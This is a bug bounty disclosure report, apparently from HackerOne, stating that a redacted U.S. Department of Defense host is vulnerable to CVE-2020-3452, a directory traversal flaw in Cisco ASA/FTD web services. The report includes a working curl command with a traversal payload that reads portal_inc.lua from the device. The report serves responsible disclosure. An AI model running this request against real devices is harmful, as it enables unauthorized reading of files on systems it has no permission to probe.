Lucene search

K
hackeroneMoon_shadowH1:998925
HistoryOct 05, 2020 - 10:03 p.m.

U.S. Dept Of Defense: https://████ is vulnerable to cve-2020-3452

2020-10-0522:03:17
moon_shadow
hackerone.com
31
cisco adaptive security appliance
firepower threat defense
directory traversal
webvpn
anyconnect
http request
vulnerability
remote attack
sensitive files
bug bounty

EPSS

0.975

Percentile

100.0%

Description:
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.

Impact

Step-by-step Reproduction Instructions

to reproduce run the below curl command, and you will see the content of portal_inc.lua

curl -ik ‘https://█████████/+CSCOT+/translation-table?type=mst&textdomain=/%2BCSCOE%2B/portal_inc.lua&default-language&lang=../

Impact

A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device